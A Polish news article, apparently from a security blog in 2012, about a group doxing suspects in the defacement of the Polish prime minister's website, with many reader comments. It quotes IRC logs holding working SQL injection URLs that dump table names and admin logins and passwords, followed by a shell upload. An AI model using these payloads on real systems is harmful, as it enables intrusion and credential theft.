21:40
26/1/2012

Tajemnicza grupa Happyninjas opublikowała informacje na temat osoby, która może odpowiadać za włamanie na stronę premier.gov.pl. Ujawniono dane atakującego, a ten …przyznał się do zarzucanych mu czynów.

Nie ma pewności, że informacje opublikowane przez Happyninjas są w całości prawdziwe i jak najbardziej należy do nich podchodzić z dużą dozą nieufności. Nie sposób jednak nie zauważyć tego, że zebrane przez Happyninjas dane są bardzo bogate w szczegóły i co najmniej część z opisywanych zdarzeń można potwierdzić w innych, niezależnych źródłach.

W internecie krąży pierwsze polskie wydanie typu “Owned & Exposed” (por. zagraniczne wydania Owned & Exposed), czyli dokumentu opisującego w szczegółach konkretne osoby oraz ich “grzeszki”. Wszystko to okraszone logami z IRC-a i linkami do profili na portalach społecznościowych. Pojawiają się też numery telefonów i adresy.

fir3_elusiven

Bohaterami jest dwóch mężczyzn o pseudonimach Fir3 i ElusiveN (dokument wymienia także inne nicki z jakich korzystali). Happyninjas pierwszemu z nich zarzucają podmianę kont bankowych na stronach sklepów internetowych w celu kradzieży wpłat od klientów, włamania do hostingów freecast.pl oraz hekko.pl (por. wyciek danych 900 użytkowników), a także ostatnie ataki na strony rządowe; drugiemu w zasadzie nie przypisują żadnych konkretnych przestępstw komputerowych poza współudziałem w atakach na stronę premiera — ujawniają kompromitujące logi z rozmów na IRC dotyczące handlu narkotykami.

Atak na stronę premiera

Według Happyninjas, za podmianą strony premiera stoją poniższe osoby: Patient, który znalazł podatność SQL injection oraz Fir3, który z niej skorzystał:

00:29 <@patient> https://www.premier.gov.pl/admin/index.php?do=satan%00"'xor ../'&ac=login
00:29 <@Fir3> hum ?;>
00:30 <@Fir3> lfi?
00:30 <@Fir3> sql ?
00:30 <@Fir3> ?;d
00:30 <@patient> nie
00:30 <@patient> czary-mary
00:30 <@patient> link kopiujcie dokladnie tak
00:31 <@patient> nie zamieniajcie NB na special chara od razu, ma to zrobic serwer
00:32 <@patient> panel sam w sobie moze wam nie dzialac
00:32 <@patient> ale wszystkie funkcje sa na zewnatrz
00:32 <@patient> wystarczy je wziasc, pozmieniac parametry i jazda ; d
00:32 <@patient> mamy premier.gov.pl
03:21 < GrigoriMaslov> https://www.premier.gov.pl/admin/index.php?do=side&ac=login&id=32%27%20and%201=0%20union%20select%201,
uNHex%28Hex%28table_name%29%29,3,5%20FROM%20
information_schema.columns--%20and%20%271%27%20=%271
03:38 <@Fir3> https://www.premier.gov.pl/admin/index.php?do=side&ac=login&id=32%27%20and%201=0%20union%20select%201,
uNHex%28Hex%28concat%28login,char%2832%29,passwd
%29%29%29,3,5%20FROM%20_users--%20and%20%271%27%20=%271
03:38 <@Fir3> ahahaha
03:38 <@Fir3> tyle sie najebali
03:38 <@Fir3> aby pass byl admin1
03:38 <@Fir3> ok wgrywam shella
04:12 <@Fir3> ! HACKED !

Nieoficjalne informacje jakie otrzymaliśmy od przedstawicieli administracji rządowej potwierdzają wektor ataku ujawniony przez Happyninjas. Tu Happyninjas mówią prawdę.

Z kolei Dziennikarze Gazety dotarli do Fir3. Mężczyzna w rozmowie z nimi nie wypierał się swoich dawnych problemów z prawem opisanych przez Happyninjas, ale zaprzeczył, że stał za atakami na kancelarię premiera. UPDATE: teraz potwierdził.

Dlaczego taki dokument został opublikowany?

Oddajmy głos Happyninjas:

Mamy po prostu ich dość i _demaskujemy_ ich z całą świadomością. Idiotyczne podmiany stron nie robią na nas żadnego wrażenia, ale kradzieże pieniędzy ze stron w internecie, na których być może zakupy robią nasi bliscy nie zostaną zostawione same sobie. Nie wspominając już o e-terroryźmie w postaci ataków na strony rządowe. Koniec pozerki oraz lansu, panowie. Poza tym, “walczycie o wolność słowa w internecie” sprzeciwiając się ACTA? My też -dlatego wszystko będzie jawne i ten dokument zobaczy sporo osób, bo informacja ma być wolna.

Niestety, trzeba zwrócić uwagę na to, że publiczne wytykanie palcami osób, które faktycznie mogą odpowiadać za włamania może przynieść skutki odwrotne od oczekiwanych. “Napiętnowani” ze strachu zaczną kasować wszystkie dowody swoich “zbrodni”, a dokument sporządzony przez Happyninjas niestety nie jest wystarczającym (i wiarygodnym) dowodem w sprawie sądowej, zwłaszcza, że wszystko wskazuje na to, iż opublikowane przez Happyninjas informacje zostały zdobyte poprzez popełnienie co najmniej kilku przestępstw…

I komu tu ufać? Włamywaczom, czy włamywaczom? Czy jedni są mniej “włamliwi” od innych?
[poll id=”24″]


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

116 komentarzy

Dodaj komentarz
 1. Wyrównane głosowanie. ;)

 2. powiedział kłamca – teraz powiem prawdę: zawsze kłamię ;) podoba mi się fragment z 3:38 :)

 3. Nie podoba mi się – gdzie jest taki button?
  Ich powod jest beznadziejny… zdradzają swoich po “fachu” o ile mozna to w ogole tak nazwac. To tak jak by rasta man dal namiary panom policjantom na innego rasta manaz ze ten pali zielsko bo przeciez istnieje “wolnosc slowa”. A moze poprostu nie dodali ich w dziale “greetz” przy hacku i zazdrosc im dupe zzera?

  • Też mi coś tu nie gra. Rozumiem że chcieli zdemaskować ludzi którzy “atakują niewinnych” (“kradzieże pieniędzy ze stron w internecie, na których być może zakupy robią nasi bliscy”), ale tekst “Idiotyczne podmiany stron nie robią na nas żadnego wrażenia” jest bez sensu. Niech zrobią coś lepszego, jeśli są tacy mądrzy i są przeciwko ACTA.

  • Ej no. Poczytajcie najpierw o tym nie tylko na Niebezpieczniku.
   W tym artykule macie linki do artykułów Gazety. Ichni reporterzy wymienili kilka maili z Happyninjas.
   Ta grupa napisała, że ujawniła ich dane głównie dlatego, że po tym deface’ie zaczęła się nagonka na wszelkich hackerów i takie ataki przynoszą wręcz odwrotny skutek.
   To tak w mega skrócie.

 4. Gdzie jest ten dokument dostepny w calosci ?

  • W internecie.

  • Przepisz sobie fragment ze screena :]

 5. Zaczyna się dyskredytacja potencjalnych “szkodników”, jacy oni źli, niedobrzy, kryminaliści – aby tylko zmanipulować opinię publiczną.

 6. Co do rzekomej podmiany kont bankowych na stronach sklepów internetowych – w tych logach podobno napisano, że tak samo została zaatakowana strona Wrocławskiej Karty Miejskiej. I tu moje pytanie, czy coś Wam, Niebezpiecznikom wiadomo o takim ataku?

 7. Nawet jesli to prawda, to zal mi strasznie tych pseudohackerow ninja cos tam ktorzy chyba mocno pozazdroscili reszcie. Zle robia oj zle bardzo zle… najpierw wspolpracuja a potem dupe obsmarowuja. Takich gnoi sie niszczy :) Jak widac polacy musza sie jeszcze bardzo duzo nauczyc od innych krajow nad tym jak sie wspolpracuje ze soba. Jakos nie zdarzylem zauwazyc aby obce narodowosci sobie tak dupe obsmarywali, zazwyczaj ida w parze i sa bardzo solidarni. polak tez choy ;/

  • Zapewne adwokaci sprawców ataku na stronę premiera podważą wiarygodność logów upublicznionych przez happyninjas, bo te dane także zdobyto drogą przestępstwa. Dowody zdobyte nielegalnie są bezwartościowe. Stąd policja dokonując prowokacji tak bardzo się stara, by dowody były zdobyte zgodnie z prawem i tym samym niepodważalne, bo inaczej dowody zostaną podważone.

  • Jaki kraj — tacy hakerzy, jaki kraj — tacy anonimowi.

  • W Polsce niestety nie działa zasada “owoców z zatrutego drzewa” jak w USA. Dowód zdobyty z naruszeniem prawa może być przedmiotem oceny sądu.

  • Pawle, chyba za dużo amerykańskich filmów się naoglądałeś o “owocach zatrutego drzewa”. Ani konstytucja, ani k.c., ani k.p.c. nie zawierają przepisów, które zakazywałyby zgłoszenia wniosku dowodowego obejmującego dowód uzyskany w sposób sprzeczny z ustawą. Nie zawierają też przepisów nakazujących sądowi oddalenie takiego wniosku dowodowego.

   W k.p.k. mamy co prawda zakazy dowodowe (np. nielegalne jest przedstawienie wymuszonych zeznań), ale to nie to samo.

   Jako zasadę przyjmij, że u nas to sąd ma swobodę w ocenie dowodów. I nie mieszaj ludziom w głowach, bo jeszcze gotowi w to uwierzyć.

 8. Swietne wyniki ankiety!:D
  Z jednej strony Happyninjas zachowalo sie frajersko ale jak wspomniano pod koniec arta publiczna publikacja danych ratuje naszym bojownikom ‘NIE dla ACTA’ dupe bo jak wspomniano, wszelkie dowody juz pewnie poszlyyy..

 9. Czy to nie Ci sami Happy Ninjas rm/rfowali serwery z forami carderów? Co prawda zgadza się tylko nazwa grupy, ale sposób działania podobny…

 10. Nie ElusieveN, a ElusiveN, znany ze swojej maluczkości script kid, który przedstawia się jako haker, a nie robi nic poza korzystaniem z gotowych exploitów.

 11. Fir3 to mój znajomy. W życiu nie uwierzę, że on byłby na tyle głupi, by nie skorzystać chociażby z TORa.

  Btw. jeśli to rzeczywiście on, to gdy wkrótce ukaże się więcej informacji nt. deface’a premier.gov.pl, to możecie być pewni, że shell wspomniany w logach IRC to r57

  • Twoje gimnazjum i frendy hakierzy tam ->

   Spadaj z takimi komciami na wykop, elo.

  • fajnych masz kolegow u mnie na forum wyrwal od razu bana za debilizm

  • >kradnij pieniadze od klientow sklepow wedkarskich
   advice fir3
   >trzymaj logi z irca na serwerze http

   bambo prosba, klikniecie w ikone z podpisem Start Tor Browser.exe jeszcze nikomu nie zastapilo mozgu.

 12. Ach, zapomniałbym: /redakcja/ to jakiś nowy redaktor Niebezpiecznika? ;-)

  • No właśnie, może jakiś agent, że tak specyfikuje, jak się prowadzi śledztwo? :D

 13. CZysta konfidentura nie ważne czy trafna ważne że konfidentura. Konfidenci won! sprzedajcie sami siebie! ci zrobili bardzo dobrze a oni albo ich wydali albo próbowali ale się pomylili!

 14. Not sure if trolin..

  Toz to z zalozenia branzowy pudelek;-)

 15. A a propos Urbancard – tego samego dnia co deface, na kanale #stop-acta….
  http://pastebin.com/jF6t7J8F

 16. BTW .. Tytul sugeruje, ze ‘redakcja’ wie kto zaatakowal premiera, co z tresci jednak nie wynika. Zeby bylo smieszniej – adres posta nadal nie wie;-P

 17. Hahahahahahahaha jakiś “d3m0n” był na ich ircu, czyżby ten troll? ;]

 18. I jedni i drudzy mają gwarancję problemów z prawem. I słusznie, bo mamy do czynienia z ewidentnym przestępstwem, czyli atakiem na strony internetowe. Z jednej strony Happyninjas piętnują ataki na strony .gov, ale z drugiej ich postepowanie można porównać do ostrzeżenia złodzieja czy pasera o czekającym zatrzymaniu. Wiadomo, że ostrzeżony zrobi porządek z dowodami, choć jest jeszcze informatyka śledcza (ale jest też polska firma, która rozpuszcza dyski twarde i potępieni przez Happyninjas mogą z niej skorzystać). Gdyby Happyninjas faktycznie chcieli kogoś napiętnować po prostu podesłaliby dowody policji, a tak zachęcili napiętnowanych hakerów do zatarcia śladów.

  • A może właśnie o to chodziło? Świat o nich usłyszał, a przy okazji nie bardzo jest jak się im dobrać do skóry :)

 19. Każdy ma prawo do swojego zdania więc niekoniecznie powinno nazywać się to frajerstwem.
  Kolejna sprawa, to mimo wszystko nawet “kolegom po fachu” nie powinno się ufać. Robisz coś sam – zachowaj minimum dyskrecji aby nie znalazł się ktoś.. gorszy, zły, zazdrosny?

  BTW. Odpowiedziałem na Tak w wyrównanej ankiecie, ale mimo wszystko mam wiele wątpliwości.. przydałaby się odpowiedź “ciężko powiedzieć” czy coś takiego ;-)

  BTW2. Pytanie gdzie jest dokument dostępny, a odpowiedź “w internecie” to trochę dla mnie już podupadanie niebezpiecznika.. gdzie zagadki naprowadzające, albo chociaż uśmiech szyderczy, a sam z chęcią bym przeczytał te wypociny ;-)

  No offense.. egh.. offence

 20. mnie ciekawi ten fragment (o ile to autentyk) ” 22:14 -!- _You’re_ now known as POPEK”
  albo podsłuch, albo logowanie miał ustawione i mu ukradli (tja), albo …?

 21. Przeczytałem ten ich dokument, poziom inwigilacji przez happyninjas zrobił na mnie wrażenie. Sprawia ważenie wiarygodnego ale od oceniana są odpowiednie instytucje.
  Ale uważam że publicznie pranie brudów jest złym pomysłem.

  • Przepraszam, jakiej inwigilacji? Nie wiem czy wiesz, ale większość danych jest dostępna w Google, natomiast logi – cóż, fir3 był znany ze swoistego ekshibicjonizmu, zatem nie zdziwiłbym się, gdyby sam je udostępnił komuś, kto mu potem zaszkodził.

 22. A już najciekawsze jest jak domorośli władcy klawiatur w ocieplonych kapturach wyzywają się od konfidentów. Do tego zawsze wkręcą się kibole z “chrześcijańską” miłością na pyskach i obrońcy wszystkiego co można oprotestować. Już trochę na tym świecie żyję i pewne rzeczy są niezmienne, ale to nie jest protest song w wykonaniu hipisa, to zwykła rozróba w wykonaniu rozwydrzonej “młodzieży”.

  • Głos na puszczy, święte słowa. Smutne, że ktoś, kto robi takie rzeczy nie potrafi należycie zadbać o własne bezpieczeństwo. Szewc bez butów chodzi?

   Szkoda chłopaka. Rząd będzie rządził dalej, Polacy wybiorą pana Premiera albo inne palikadzidełko na 100 kadencji i będą chylić się do ziemi pod 10000% podatkami.

   Nie w atakach na strony rządowe ratunek tylko w wyłączeniu TELEWIZORNI i odstawieniu alkoholu, ale na to widoki w tym kraju są marne bardzo.
   Pozdrawiam wszystkich

  • JESTEM Z CIEBIE DUMNY!

  • Zwłaszcza na odstawienie alkoholu nie liczyłbym. Trzeba byłoby utrudnić dostęp do alkoholu jak w Skandynawii.

  • Flamebait? (Założenie grzeczne)

 23. Pytanie skąd mieli np taki dokument:

  [deleted]

  Są dwa wyjścia: albo ktoś pracuje dla włamywaczy w prokuraturze albo to podpucha.

  Przejrzałem wspomniane logi IRC, obejrzałem profile NK, GL i dochodzę do wniosku, że wsypują lub wrabiają ich koledzy/znajomi.

  @moderator: proszę wyświetlenie tylko dokumentu bez linka i o zaciemnienie wszelkich danych osobowych umożliwiających identyfikację.

 24. Niebezpiecznik jak zwykle w słowotwórczej formie: “mniej ‘włamliwi'” :D Tak trzymać ;)

 25. Na pastebin można znaleźć dokument wklejony w sierpniu 2011 – na temat Fir3, prośba o więcej info.

 26. Polskie pranie brudow i zwykla zawisc – zazdrosc?
  Jeżeli wiemy, ze ktoś jest na bakier z prawem zareagujmy ale akcja ACTA jest inna – był to spontaniczny ruch – po co grzebać w przeszłości jak tego nie zrobiono wcześniej?

 27. Elusiven mogl pomoc na bank. Jest znany po czarnej stronie. Chyba ma zawiasy miedzy innymi za wjazd na rozne hostingi. A ten Fir3 zabrac mu dostep do kompa

  • Kolego, nie masz kompletnie pojecia o czym piszesz. Fakt ze w doxie jest ujawnione duzo informacji o Fir3 jest w miare wiarygodny. Jednak ze w przypadku Elusivena nie ujawniono kompletnie nic co by go wiazalo ze sprawa… po prostu go pomowiono. Informacje na jego temat sa bardzo stare i pochodza sprzed 3-4 lat – sa ogolnodostepne w internecie. A fakt o zawiasach jest klamstwem.

   Mysle ze nie nalezy wyciagac wnioskow na podstawie zachowan za mlodu, bo w przeciagu paru lot czlowiek potrafi sie znacznie zmienic.

 28. Tak ciekawa jest ta chamskość ale jak ktoś jest za stary i nie pamięta jak był młody i jak reagował na niesprawiedliwość lepiej niech nie obraza innych – prostactwo w puszczy toz to niedozwolone – dajmy zwierzętom żyć! Pouczanie innych bo trochę na tym świecie żyje – nic to nie znaczy.

 29. Znalazlem ten dokument bez problemu – zamiesicili tam pelny adres Fira3, telefon, a po nazwisku dostalem sie jeszcze do jego zdjec. No OK, wlamal sie na strone premiera, ale w wywiadzie pisal, ze zostawil oryginalny index na serwerze i nic nie nabalaganil.

  Za to ci Happyninjas wg mnie przegieli i to rowno. Mniejsza o to, ze ABW ma go na dloni, ale ludzie moga mu nie dac spokoju… nawet jesli dla niektorych bedzie bohaterem…

 30. doskonaly sposob aby zyskac ‘slawe’ i przy okazji czesciowo sie oczyscic, wykrecic, namotac i pomoc adwokatowi

 31. Napisałem wiersz:

  Wpisuje jedynki, i szukam zera,
  Ciężki jest żywot małego hakera.
  Emacsem przez sendmail, wysyłam exploity,
  Jestem w Anonymous, należę do elity.
  O wolność ja walczę, moją i twoją.
  ACTA wprowadzą – dokopać gnojom.
  Przeciążać serwery, DdoS`sować.
  Nie będą wolności nam atakować.
  To w słusznej sprawie cała afera,
  bo chcemy umrzeć przy komputerach.

  • Mielimy bajty, piszemy ‘splojty,
   Chcemy małej słusznej rewolty,
   Bandę złodzieji od A.C.T.A. wysadzić,
   Z foteli dupsk ich fetor rozsadzić,
   Przenieść na śmietnik historii.

   Wolności słowa dziś jest niewiele,
   A i tę oazę chcą zabrać trzmiele,
   Trutnie, łachmyty i komuniści,
   Niech jadą banany se zrywać kiści,
   Ja chce w Polsce być w piątek i w niedzielę.

   Ja chcę żyć w państiwe nie-policyjnym,
   Niech mi nie wchodzą wejściem tylnym,
   Anonimowi to jednak banda tchórzy,
   Jeden może mały, ale drugi duży,
   Z otwartą przyłbycą badź nieomylny,
   I powiedz:

   PRECZ Z A.C.T.A. !! !! !!

 32. Wcale bym się nie zdziwił gdyby to była akcja jeżeli nie samych służb, to przez nie inspirowana. Skutecznie może podzielić i skłócić całe środowisko

  • To też możliwa opcja. Służby są zainteresowane skłóceniem hakerów. Skłócony wróg jest mniej skuteczny i tym samym mniej groźny. Tu jednak służby mogły zostać wyręczone przez kłótnie grup hakerskich. Na tej samej zasadzie dochodzi do wojen gangów, bo w grę wchodzi zazdrość, walka o wpływy itp.

  • Poważny wróg (taki w pełnym tego słowa znaczeniu) nie da ani skłócić z powodu morale, a tym bardziej wyrwać z ręki argumentu.

 33. Dowody zdobyte nielegalnie nie muszą być bezwartościowe – każdorazowo ocenia to sąd.
  Nie mieszkamy (na szczęście) w USA.
  Co nie znaczy, że sąd uzna ich wiarygodność jako dowodów jedynych. Ale może się udać uznać dowód jako jeden z wielu – w końcu ABW/prokuratura mogą sprawdzić krok po kroku logi i tędy dojść, a “dowody” HN uznać jako wskazówkę w szukaniu dowodów.

 34. Dzieńdobry, ja z offtopowym zażaleniem, że nie aktualizujecie swojego profilu na G+ i o nowych wpisach dowiaduję się z RSSa. No jak to tak?

  • Nasz robot do Gugla zachorował, a ten od Fejsbuka nie chce go zastępować. Mówi, że na Plusie nie czuje się komfortowo… L4 guglowemu robotowi kończy się w poniedziałek.

 35. @Paweł Nyczaj
  “Zapewne adwokaci sprawców ataku na stronę premiera podważą wiarygodność logów upublicznionych przez happyninjas, bo te dane także zdobyto drogą przestępstwa. Dowody zdobyte nielegalnie są bezwartościowe”

  Tylko w serialach kryminalnych made in USA, w Polsce sąd ma prawo do swobodnej oceny dowodów, nie działa zasada “owoców z zatrutego drzewa”

 36. hieh…za pare lat urośnie nam nowy specjalista od zabezpieczeń “były haker”, który będzie komentował włamania dla TVNu :D

 37. Nio… najwyższa półka hack. 3 dni i ich dane fruwają po necie buuuuahhhhhh. Dzieci.

 38. Jeżeli tak jest zabezpieczona strona premiera to życzę powodzenia. Każdy młody amator włamywania po godzinnej lekturze o SQLi potrafiłby wykorzystać taką lukę.

 39. “Mamy po prostu ich dość i _demaskujemy_ ich z całą świadomością”

  Wy chyba nie macie świadomości

  “Idiotyczne podmiany stron nie robią na nas żadnego wrażenia”

  A G… ich obchodzi co na was zrobi wrażenie to nie było na pokaz w stylu “Co potrafimy”
  po prostu to ludzie i chcą pomóc

  “ale kradzieże pieniędzy ze stron w internecie, na których być może zakupy robią nasi bliscy nie zostaną zostawione same sobie”

  A kogo to wina że mają takie słabe zabezpieczenia ? Niech wynajmą jakaś porządną firmę żeby zrobiła zabezpieczenia

  “Nie wspominając już o e-terroryźmie w postaci ataków na strony rządowe”

  I kto mówi o e-terroryźmie ? Wy nic nie robicie dobrzy Hakerzy ^^ może jeszcze Nobla dostaniecie

  “Poza tym, “walczycie o wolność słowa w internecie” sprzeciwiając się ACTA? My też -dlatego wszystko będzie jawne i ten dokument zobaczy sporo osób, bo informacja ma być wolna. ”

  Wolna to powiedz kim jesteś cwaniaku -.- A co wy robicie w tym kierunku ? Nawet o was nie słyszałem ? Dzieci z podwórka ^^

  Pozdro Padle

  • I co ten deface dał? Polska nie podpisała ACTA? A nie, czekaj, zrobili wioskę ze stron rządowych i nic to nie dało.
   A że nie znasz HappyNinjas to Twój problem, bo goście są raczej znani.
   “A kogo to wina że mają takie słabe zabezpieczenia ?”
   Jak złodziej wejdzie Ci do domu i weźmie TV to też będzie Twoja wina, bo masz słaby zamek, nie?

  • @Sergio: zwrócili uwagę. Taks amo jak ludzie na ulicach zwrócili uwagę. Ludzie na ulicach też nic nie zrobili jako tako. Wszystko zmierza w kierunku zwiększenia świadomosci. A jak dotrzeć do ludzi?
   Poprzez media, a jak dotrzeć do mediów? Zrobić szoł. I ta podmiana czymś takim była.

   Już dawno (czy kiedykolwiek w ogóle?) do ludzi nie dociera się rzeczowymi argumentami, bo takowe są nudne. Trzeba to otoczyć czymś interesującym. Moim zdaniem ten deface, czy ddosy takie były. Były jednym z kroków, które zbliżają do sukcesu walki z ACTA.

 40. ale ograniczenia zwiazane z alkoholem to dopiero socjalizm i ograniczanie wolnosci! Kazdy ma swoj rozum, a wolny rynek i tak za kilka lat zniszczylby tv…

 41. Już się zaczęło kablowanie!? Co będzie jeżeli ACTA przejdzie? Będzie tyle donosów, że urzędnicy nie zdarzą wszystkich sprawdzać. Szczęśliwi konfidenci pewnie są dumni, ze swojego donosu.

 42. niestety jesli pol narodu chodzi zamroczone alkoholem, nic z tym krajem nie da sie zrobic. bo wladzom tylko o to chodzi… piwo, tv – brainwash machine mode on.

 43. hapicośtam to zapewne P.K we własnej osobie
  który nie jako z urzędu jest zo obowiązany do opowiadania się po stronie faszystowsko-autorytarno-burżuazyjnego państwa
  ABW nie śpi

  • twoj nick idealnie oddaje twoj stan umysłu :]

 44. No wlasnie podali w TVP Info, ze mieszkaniec Opola przebywajacy we Wroclawiu zostal wczoraj aresztowany ]:-> No i ma mokro gosciu.

  • nie ma mokro dzisiaj juz udzielal wywiadu na gazeta.pl :)

 45. nie cierpię lansujących się haksiorów jak np Fir3 ale konfidentów z branży tym bardziej !!! sprzedawczyki jedne mam nadzieje że się tak samo przejadą jak Fir3 !!!

 46. Panowie może pytanie to lamerskie troche, ale ucze się i czytam , podpowiedzcie proszę ten kanał irca , podajcie proszę namiary na serwer i kanał.

 47. Wierzysz Happyninjas?
  Może warto zapytać: Jak oceniasz postępowanie Happyninjas?
  Złodziej złodziejowi nierówny.

 48. ElusiveN nie jest bodajże z fusi0n-group? ;)

  • on to ma certyfikaty na wszystko wiec nie ma co

  • fusi0n-group juz nie istnieje

 49. Jak tak na to patrze to widzę że intencje autorów są zgoła przeciwne, to co mówią
  to klasyczny przykład argumentacji wiatraka przy pomocy piernika. Mówiąc wprost czysto polityczna sprawa nie wierze żeby autorzy mieli jakikolwiek problem z rzekomymi kradzieżami.

 50. Konfidenci z Happyninjas.
  “Konfidencie i co teraz z tobą bedzie, żyjesz teraz na ciągłym oriencie…”

 51. Lol.. sytuacja jak z piosenki:
  http://www.youtube.com/watch?v=KxX8fPCsZDQ

  XD

 52. Imo, jak już walczyć z rządem lub tymi którzy najwięcej w nim szkodzą, to właśnie w ten sposób w jaki zaprezentowali happyninjas, tzn ujawniać wszelkie nielegalne konta z kasą z defraudacji, przestępstwa w przetargach i inne wrażliwe dane.

  W przeciwieństwie do ddos, czy deface tego nie mogli by tak łatwo olać.

 53. Happyninjas to HIPOKRYCIi !!!!!!!!!!!!!!!!!!!!!!!!!!
  Wielcy obrońcy prawa niczym robin hood, a co zrobiliście aby powstrzymać ACTA skoro też się sprzeciwiacie ? A jeśli sprzeciwiacie się ACTA do dlaczego ?

  Społeczeństwo sprzeciwia się z bardzo prostego powodu.
  Chcemy być anonimowi, nie chcemy być inwigilowani i chcemy wolności w sieci.
  A Wy panowie robin bood ?
  Sami się kryjecie a innych wydajecie !!
  To co opublikowaliście jest zaprzeczeniem samym w sobie ! Komuniści i konfidenci !!!
  A Fir3 przynajmniej nagłośnił sprawę, faktem jest to że gdyby nie on o ACTA dowiedzielibyśmy się dopiero wtedy gdy któryś z internatów został deportowany do USA za “piractwo”, tak jak to ma miejsce w UK. A to co wy robicie to czysta hipokryzja !!! Ps. Ciekawe czy happyninjas ma oryginalne oprogramowanie ;>

 54. A ja się jeszcze raz zapytam, PO CO WAM TA WOLNOŚĆ SŁOWA i DEMOKRACJA?
  Rząd i tak Was (Nas) nie słucha, zajmuje się rozdawnictwem stołków swoim przydupasom, kombinuje jak wyprowadzić kase z państwa a politycy PO w tym przodują. Do tej pory nikomu to nie przeszkadzało, i teraz się zrywacie jak poparzony kot. Obronicie się przed ACTA to znajdą inne sposoby na wprowadzenie tych przepisów, nie pierwszy raz próbują przepchnąć coś pod stołem i będą to robić jeszcze wiele razy. Możecie sobie krzyczeć, płakać a rząd będzie kradł i rozdawał nasze pieniądze, i HappyNinjas czy inne cyberpunki świata nie zmienią. Jeżeli chcecie prawdziwej zmiany to Wy musicie znaleźć się w rządzie jako partia i decydować o losie Polski. No tak odwagi brak. Ale możecie zacząć od założenia stowarzyszenia – 15 osob potrzeba – wystartować do sejmików wojewódzkich, na burmistrzów, radych, a potem do sejmu.

  • kiedys sie trzeba zbuntowac. powiedziec dosc. moze to wlasnie ta chwwila , ze mlodsze pokolenie, ktore jest swiadome swiata, mowi wreszcie dosc tego.moze do tej pory dzialania politykow byly nieco poblazliwie traktowane. ale nastal wreszcie czas, w ktorym ludzie sa swiadomi co sie dzieje, ze sa oklamywani od dawna, mlodsze pokolenia zaczynaja brac los w swoje rece. dzisiaj kazda informacja rozchodzi sie w sekundzie i jest praktycznie dostepna na pstrykniecie palca. w tej sytuacji politycy sa nieco bezbronni.. – jak widac na przykladach. jednak i tak robia swoje. dosc juz tego! w konstytucji jest jasno napisane ze to my obywatele ksztaltujemy panstwo. (internet juz od dawna ma taka forme jaka mu jego uzytkownicy nadali i wykreowali) my sami wybieramy rzadzacych i jak zle spelniaja swoj urzad mamy prawo sie ich pozbyc. tak wynika z konstytucji

 55. Tiaa, “nindża-podrabiacze-torebek” podają linka do skanu odpisu nakazu przeszukania mieszkania głównego podejrzanego. Dostęp do tego dokumentu miał drukarz i adresat.
  Zakładając, że adresat nie chwalił się takimi rzeczami, zważywszy na jego exchibicjonizm, to “podrabiaczy torebek” należy szukac w drukarni albo w bliskim otoczenia adresata. Nie wykluczyłbym samego adresata.
  http://video.google.com/videoplay?docid=-8326245648214688632

  • no, ten filmik bardzo dobrze okresla happy ninjas, banda zazdrosnych frajerow

 56. Szczęśliwi kable ;)

 57. wlasnie w radiu powiedziano, ze zostal zwolniony do domu, to nie on

  • jak to nie on, jak sam się przyznał :)

  • Z braku dowodów nie mieli innego wyjścia. Jak już w samym artykule napisano, nie jest to wiarygodny dowód. Mało tego. Teraz może złożyć doniesienie za upublicznienie jego danych personalnych i teraz mogło by być ciekawie, czy wszczęli by śledztwo i co z tego by wyszło? Ja bym tak zrobił! ;-D

 58. Robi się zadymy aby wyciszyć inne sprawy:
  http://www.youtube.com/watch?v=g32zLT2nJxo&feature=player_embedded

  • Po obejrzeniu tego w telewizorni szukałem informacji w sieci, spodziewać by się można, że wszyscy będą o tym trąbić, a tu cisza. Widocznie informacja mało ciekawa. Może takie pytania są na porządku dziennym? Może USA interesują się tak bardzo wszystkimi głosowaniami w krajach partnerskich?

   Może za jakiś czas na PLANETE (swoja drogą polecam) pokażą nowy program np. o polityce USA i lobbingu Monsanto czy innych firm biotechnologiczno-inżynieryjno-genetycznych w kontekście pewnego kontrowersyjnego porozumienia. To by tłumaczyło, dlaczego informowali o tym w notatce dotyczącej rolnictwa. Ewentualnie o jakichś innych przekrętach. Chyba, że faktycznie chodzi o internet i poprostu chcięli to ukryć.

   Cóż, chyba do niczego konkretnego nie dojdę.

 59. Wydaje się, że są to ludzie z wojska (pozdrawiam panów czytających ten komentarz) lub policji. Aby zdobyc te dane trzeba było dokonac przestepstwa włamując sie na kilka maszyn (w tym routerów). Inaczej nie mogli tego opublikować więc nazwali się grupa hakerską i nasłali na nich policję.
  Takie prawo, takie metody.
  [sam bym chciał taka naszywke z siecią]

 60. nie, nie wiemy. w polskim prawie istnieje coś takiego jak domniemanie niewinności i nie obala go donos pożal się boże hakierów.

  • Tylko czemu musimy udowadniać swoją niewinność?

 61. Szkoda.

 62. strona petycje online, gdzie ponad 60 tys. ludzi podpisuje się pod petycję o odwołanie premiera i jego rządu nie działa :(

 63. http://www.tvn24.pl/-1,1732830,0,1,podejrzewany-o-atak-na-strone-premiera-bez-zarzutow,wiadomosc.html

  22-latek z województwa opolskiego, zatrzymany w związku z podejrzeniem włamania się na stronę premiera w geście sprzeciwu wobec umowy ACTA, został przesłuchany w charakterze świadka. Jak informuje wrocławska prokuratura, Łukasz S. nie usłyszał zarzutów. Zaprzeczył, że kiedykolwiek włamywał się na strony rządowe. Mężczyzna jeszcze w piątek zostanie zwolniony do domu.

 64. wiem że może to co robili nie było dobre ale Ci co ich ujawnili nie ma zyskają na tym ani trochę szacunku a wręcz przeciwnie

